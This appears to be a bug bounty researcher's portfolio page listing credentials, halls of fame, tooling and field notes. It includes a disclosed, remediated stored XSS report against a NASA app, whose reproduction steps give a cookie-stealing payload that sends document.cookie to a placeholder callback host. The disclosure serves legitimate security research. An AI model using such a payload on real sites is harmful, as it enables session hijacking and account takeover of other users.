GARRETT KOHLRUSCH // BLAINE, MN // HUNTING

I find what shouldn't
be there.

Security researcher specializing in offensive security, web application testing, and vulnerability discovery through responsible disclosure and bug bounty programs. Operator of GK Data LLC — a consultancy built around hunter-mentality testing, accurate findings, and clean remediation paths.
Findings
100+
CVE
#?Soon?
Halls of Fame
10+
Cumulative
~$35k+
View Selected Findings Initiate Contact
01 WHOAMI

A hunter's approach to offensive security — built after hours, proven in production.

I'm a Security researcher with 5+ years of hands-on web application testing and 100+ validated vulnerabilities across Fortune 500 companies, U.S. government systems, and major consumer platforms.

My core discipline is web and API offensive security: IDOR exploitation, authentication bypass, stored XSS with session exfiltration, CORS misconfiguration, SSRF escalation, JavaScript source analysis, and chained-impact reporting. I don't stop at the first PoC — I push until the real impact is on the page.

Alongside full-time work, I operate GK Data LLC, a cybersecurity consultancy delivering penetration tests and vulnerability assessments. I ship open-source tooling for the bug bounty community, write methodology breakdowns, and maintain active engagements on private Bugcrowd programs targeting critical infrastructure and consumer-scale platforms.

Currently open to security research, application security, and offensive security engineering roles — remote or on-site — in environments where security is taken seriously and research is encouraged.

Open to Work Remote / Hybrid W-2 or Contract US-Based
02 HALL OF FAME

Organizations that have acknowledged my vulnerability research through public hall-of-fame listings, letters of appreciation, or private program recognition.

Apple Hall of Fame
TheTradeDesk Hall of Fame
NASA Hall of Fame
StateFarm Hall of Fame
Meta Accepted Report
Microsoft Accepted Report
03 SELECTED FINDINGS

Redacted summaries of disclosed and remediated research. Target names withheld where required by program disclosure policy.

P2 · HIGH

Stored XSS in Comment Field of Observation – Leads to Cookie Theft and JS Execution

NASA GLOBE Observer Mobile App / Web - Stored XSS Vulnerability

Affected Endpoint

https://www.globe.gov/web/

Affected Feature

Observation Comments (Publicly Shared)

Summary

A stored XSS vulnerability was discovered in the comment field of shared observations within the NASA GLOBE Observer mobile app. By injecting malicious HTML/JS code in the comment, I was able to execute JavaScript in the browser context of any user viewing the observation. The payload was executed automatically upon page load and was reflected on public/shared observation pages. This allows full session hijacking and account compromise, especially due to the ability to exfiltrate session cookies to an external server.

Steps to Reproduce

  1. Install the NASA GLOBE Observer mobile app.
  2. Create or select any observation. I chose tree measurement and just took random photos on the observer app for latest iOS—this renders on the web version of viewing observations globally.
  3. In the "comment" field, input the following payload: 
    <img src=x onerror="new Image().src='https://CALLBACKURLHERE?cb='+encodeURIComponent(document.cookie)">
  4. Submit the observation.
  5. Visit the observation's public/shareable URL (e.g., https://www.globe.gov/web/lightrip/...) from any other account or incognito session.
  6. Upon loading the page, the script:
    • Executes automatically
    • Sends the user's cookies to the attacker's server
    • Demonstrates persistent stored XSS shared across all users

Impact

  • Stored XSS across all users
  • Full session hijacking via stolen cookies
  • Arbitrary JS execution in NASA user sessions
  • Persistent across shared/public observation URLs
  • Could be chained for full account takeover or privilege escalation

Suggested Fix

  • Sanitize all input in comment fields to disallow any HTML tags or JavaScript
  • Encode all user-generated content before rendering
  • Use a JavaScript sanitization library like DOMPurify on the client-side, and enforce HTML escaping on the server-side
  • Apply CSP headers to mitigate risk of inline script execution
  Full disclosure: https://bugcrowd.com/disclosures/f2f4a65f-b225-4a0e-b018-104b8793ae5e/stored-xss-in-comment-field-of-observation-leads-to-cookie-theft-and-js-execution
IMPACT: Full session takeover
VRT: Stored XSS
VECTOR: User entered input
STATUS: Remediated
↳ ON TOTALS: Findings distribution across 100+ submissions — Server Security Misconfiguration (21), Server-Side Injection (12), XSS (9), AI Application Security (2), Application-Level DoS (2), Broken Access Control (1), Sensitive Data Exposure (1), Cloud Security (1), Unvalidated Redirects (1). Surfaces tested: 34× Web App, 4× API, 2× Network, 1× iOS. These records are not accurate due to NDA and private programs.
04 PUBLISHED TOOLING
BB Header Manager
  • Add unlimited custom headers
  • One-click enable/disable toggle
  • Quick presets (X-Bug-Bounty, X-HackerOne, X-Bugcrowd)
Chrome Web Store →
05 FIELD NOTES
RESEARCH LONG READ

The Scam Call Sounded Exactly Like Your Boss. It Wasn’t.

A few years ago, spotting a scam was straightforward. Broken English, urgent wire transfer requests, a sender address that was clearly off. Most people learned to recognize the…
OPINION TECHNICAL

Your Website Is Live. But Is It Safe?

Most business owners assume their website is secure because it’s working. Pages load, forms submit, payments process — everything looks fine. But “looking fine” and “being secure” are…
BUG BOUNTY LONG READ

Blind Stored XSS to Session Hijack: How I Earned My First P1

There’s a reason blind stored XSS is underrated in the bug bounty community — it requires patience, and patience doesn’t trend on social media. But if you’re willing…
BUG BOUNTY TECHNICAL

AI Reports Are Ruining Bug Bounty – Here’s How to Use It Without Being Part of the Problem

Triage teams are not drowning in vulnerability reports. They are drowning in unverified claims dressed up in polished language. AI did not create that problem, but it has…
06 CERTIFICATIONS
Comptia Sec+
JUN 2025 — JUN 2028
ID · S61PE3EQXMR4SRSJ
CompTIA Network+
APR 2025 — APR 2028
ID · KP0777KYRJF4Q43Q
IBM Cybersecurity Analyst Specialization
MAY 2022
ID · 3LNW8P3Q9WSC
07 INITIATE CONTACT

Have a target
that needs a closer look?

Available for full-time security research, application security, and offensive security engineering roles — as well as contract consulting engagements through GK Data LLC.

GKDATA.IO BUGCROWD / GKData LINKEDIN / KOHLRUSCH GITHUB / GKDATAIO